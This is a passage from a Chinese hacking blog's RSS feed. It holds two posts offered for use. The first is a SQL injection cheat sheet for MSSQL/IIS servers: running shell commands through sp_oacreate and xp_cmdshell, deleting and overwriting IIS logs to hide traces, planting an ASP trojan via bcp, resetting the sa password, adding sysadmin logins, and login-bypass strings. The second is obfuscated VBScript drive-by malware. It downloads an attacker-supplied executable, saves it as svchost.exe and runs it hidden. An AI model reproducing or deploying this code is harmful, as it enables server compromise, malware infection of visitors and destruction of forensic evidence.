				<font size="2">http://192.168.1.5/display.asp?key</font>
		</a>
		<font size="2"> ... 200&lt;&gt;db_name()<br />查看当前的数据库名称Microsoft VBScript 编译器错误 错误 '800a03f6' <br />缺少 'End' <br />/iisHelp/common/500-100.asp，行242 <br />Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07' <br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int. <br />/display.asp，行17 <br />7、 列出当前所有的数据库名称：select * from master.dbo.sysdatabases<br /><br />8、 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令：<br />create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)<br />DECLARE @shell INT<br />DECLARE @fso INT<br />DECLARE @file INT<br />DECLARE @isEnd BIT<br />DECLARE @out VARCHAR(400)<br />EXEC sp_oacreate 'wscript.shell',@shell output<br />EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\&gt;c:\temp.txt','0','true'<br />--注意run的参数true指的是将等待程序运行的结果，对于类似ping的长时间命令必需使用此参数。<br /><br />EXEC sp_oacreate 'scripting.filesystemobject',@fso output<br />EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'<br />--因为fso的opentextfile方法将返回一个textstream对象，所以此时@file是一个对象令牌<br /><br />WHILE @shell&gt;0<br />BEGIN<br />EXEC sp_oamethod @file,'Readline',@out out<br />insert INTO MYTMP(info) VALUES (@out)<br />EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out<br />IF @isEnd=1 BREAK<br />ELSE CONTINUE<br />END<br /><br />drop TABLE MYTMP <br /><br />----------<br />DECLARE @shell INT<br />DECLARE @fso INT<br />DECLARE @file INT<br />DECLARE @isEnd BIT<br />DECLARE @out VARCHAR(400)<br />EXEC sp_oacreate 'wscript.shell',@shell output<br />EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"&gt;c:\temp.txt','0','true'<br />EXEC sp_oacreate 'scripting.filesystemobject',@fso output<br />EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'<br />WHILE @shell&gt;0<br />BEGIN<br />EXEC sp_oamethod @file,'Readline',@out out<br />insert INTO MYTMP(info) VALUES (@out)<br />EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out<br />IF @isEnd=1 BREAK<br />ELSE CONTINUE<br />END<br /><br />以下是一行里面将WEB用户加到管理员组中：<br />DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"&gt;c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell&gt;0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END<br /><br />以下是一行中执行EXE程序：<br />DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\&gt;c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell&gt;0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END<br /><br />SQL下两种执行CMD命令的方法：<br /><br />先删除7.18号日志：<br />(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log &gt;c:\temp.txt'<br />(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log &gt;c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell&gt;0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END<br /><br />再考贝一个其它文件来代替7.18日文件：<br />(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log&gt;c:\temp.txt'<br />(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log&gt;c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell&gt;0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END<br /><br />9、 用update来更新表中的数据：<br /></font>
		<a href="http://xxx.xxx.xxx/abc.asp?p=YY;update" target="_blank">
				<font size="2">HTTP://xxx.xxx.xxx/abc.asp?p=YY;update</font>
		</a>
		<font size="2"> upload.dbo.admin set p ... #39; where username='www';--<br />www用户密码的MD5值为：AAABBBCCCDDDEEEF，即把密码改成1；<br /><br />10、 利用表内容导成文件功能<br />SQL有BCP命令，它可以把表的内容导成文本文件并放到指定位置。利用这项功能，我们可以先建一张临时表，然后在表中一行一行地输入一个ASP木马，然后用BCP命令导出形成ASP文件。<br />命令行格式如下：<br />bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'参数为执行查询的服务器，'U'参数为用户名，'P'参数为密码，最终上传了一个runcommand.asp的木马)。<br /><br />10、创建表、播入数据和读取数据的方法<br /> 创建表：<br />' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--<br /> 往表里播入数据：<br />' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status&gt;0,@result output insert into cyfd (gyfd) values(@result);--<br />' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--<br /> 从表里读取数据：<br />' and 1=(select count(*) from cyfd where gyfd &gt;1)--<br /><br /> 删除临时表：<br />';drop table cyfd;--<br /><br />12、通过SQL语句直接更改sa的密码：<br /> update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,这样sa的密码就被我们改成了111111拉。呵呵，解决的方法就是把sa给删拉。，怎么删可以参考我的《完全删除sa这个后门》。<br /><br /> 查看本机所有的数据库用户名：<br />select * from master.dbo.sysxlogins<br />select name,sid,password ,dbid from master.dbo.sysxlogins<br /><br /> 更改sa口令方法：用sql综合利用工具连接后，执行命令：<br />exec sp_password NULL,'新密码','sa'<br /><br />13、查询dvbbs库中所有的表名和表结构<br /> select * from dvbbs.dbo.sysobjects where xtype='U' and status&gt;0<br /> select * from dvbbs.dbo.syscolumns where id=1426104121<br /><br />14、手工备份当前数据库<br />完全备份：<br />;declare @a sysname,@s nvarchar(4000) <br />select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--<br />差异备份：<br />;declare @a sysname,@s nvarchar(4000) <br />select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT—<br /><br />15、添加和删除一个SA权限的用户test<br />exec master.dbo.sp_addlogin test,ptlove<br />exec master.dbo.sp_addsrvrolemember test,sysadmin<br /><br />cmd.exe /c isql -E /U alma /P /i K:\test.qry <br /><br />16、select * from ChouYFD.dbo.sysobjects where xtype='U' and status&gt;0 <br />就可以列出库ChouYFD中所有的用户建立的表名。<br />select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status&gt;0<br /><br />17、<br /> </font>
		<a href="http://www.test.cn/zgrdw/common/image_view.jsp?sqlstr=select%20" target="_blank">
				<font size="2">http://www.test.cn/zgrdw/common/image_view.jsp?sqlstr=select%20</font>
		</a>
		<font size="2">*%20from%20rdweb.dbo.syscolumns （where id=1234）<br />列出rdweb库中所有表中的字段名称<br /> select * from dvbbs.dbo.syscolumns where id=5575058 <br />列出库dvbbs中表id=5575058的所有字段名<br /><br />18、删除记录命令：delete from Dv_topic where boardid=5 and topicid=7978 <br /><br />19、绕过登录验证进入后台的方法整理：<br />1)' or''='<br />2) ' or 1=1--<br />3) ' or 'a'='a--<br />4) 'or'='or'<br />5) " or 1=1-- <br />6）or 1=1--<br />7） or 'a='a<br />8）" or "a"="a<br />9） ') or ('a'='a<br />10） ") or ("a"="a<br />11） ） or (1=1<br /><br />20、查看WEB网站安装目录命令：<br /> cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root &gt;c:\test1.txt <br />type c:\test1.txt<br />del c:\test1.txt<br />在NBSI下可以直接显示运行结果，所以不用导出到文件</font>
		<br />
<img src ="http://www.cnitblog.com/crazystone/aggbug/18046.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/crazystone/" target="_blank">stone</a> 2006-10-16 21:59 <a href="http://www.cnitblog.com/crazystone/archive/2006/10/16/18046.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>一个网马源码,把其中木马地址填成你自己的就可以了.</title><link>http://www.cnitblog.com/crazystone/archive/2006/10/16/18010.html</link><dc:creator>stone</dc:creator><author>stone</author><pubDate>Sun, 15 Oct 2006 23:34:00 GMT</pubDate><guid>http://www.cnitblog.com/crazystone/archive/2006/10/16/18010.html</guid><wfw:comment>http://www.cnitblog.com/crazystone/comments/18010.html</wfw:comment><comments>http://www.cnitblog.com/crazystone/archive/2006/10/16/18010.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/crazystone/comments/commentRss/18010.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/crazystone/services/trackbacks/18010.html</trackback:ping><description><![CDATA[
		<p>&lt;html&gt;<br />  &lt;script language="VBScript"&gt;<br />    on error resume next<br />    dl = "<a href="http://你的木马地址/"><font color="#ab9ad6" size="2">http://你的木马地址</font></a>"<br />    j1="clsid:"<br />    j2="BD96C556-"<br />    j3="65A3-"<br />    j4="11D0-"<br />    j5="983A-"<br />    j6="00C04FC29E36"<br />    j7=j1&amp;j2&amp;j3&amp;j4&amp;j5&amp;j6<br />    Set df = document.createElement("object")<br />    df.setAttribute "classid", j7<br />    b4="Mi"<br />    b5="cr"<br />    b6="o"<br />    b7="soft"<br />    b8=".X"<br />    b9="M"<br />    b10="L"<br />    b11="H"<br />    b12="T"<br />    b13="T"<br />    b14="P"<br />    strb=b4&amp;b5&amp;b6&amp;b7&amp;b8&amp;b9&amp;b10&amp;b11&amp;b12&amp;b13&amp;b14<br />    Set x = df.CreateObject(strb,"")<br />    a4="A"<br />    a5="d"<br />    a6="o"<br />    a7="d"<br />    a8="b"<br />    a9="."<br />    a10="S"<br />    a11="t"<br />    a12="r"<br />    a13="e"<br />    a14="a"<br />    a15="m"<br />    strd=a4&amp;a5&amp;a6&amp;a7&amp;a8&amp;a9&amp;a10&amp;a11&amp;a12&amp;a13&amp;a14&amp;a15<br />    set SS = df.createobject(strd,"")<br />    SS.type = 1<br />    f4="G"<br />    f5="E"<br />    f6="T"<br />    stre=f4&amp;f5&amp;f6<br />    x.Open stre, dl, False<br />    x.Send<br />    fname1="svchost.exe"<br />    set F = df.createobject("Scripting.FileSystemObject","")<br />    tmp2=2<br />    set tmp = F.GetSpecialFolder(tmp2)<br />    SS.open<br />    fname1= F.BuildPath(tmp,fname1)<br />    SS.write x.responseBody<br />    SS.savetofile fname1,2<br />    SS.close<br />    z1="She"<br />    z2="ll.A"<br />    z3="ppli"<br />    z4="cat"<br />    z5="io"<br />    z6="n"<br />    zz=z1&amp;z2&amp;z3&amp;z4&amp;z5&amp;z6<br />    set Q = df.createobject(zz,"")<br />    Q.ShellExecute fname1,"","","open",0<br />    &lt;/script&gt;<br />    &lt;head&gt;<br />    &lt;title&gt;天空界&lt;/title&gt;<br />    &lt;/head&gt;&lt;body&gt;<br />    &lt;/body&gt;&lt;/html&gt;<br />    by:SetFree</p>
<img src ="http://www.cnitblog.com/crazystone/aggbug/18010.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/crazystone/" target="_blank">stone</a> 2006-10-16 07:34 <a href="http://www.cnitblog.com/crazystone/archive/2006/10/16/18010.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>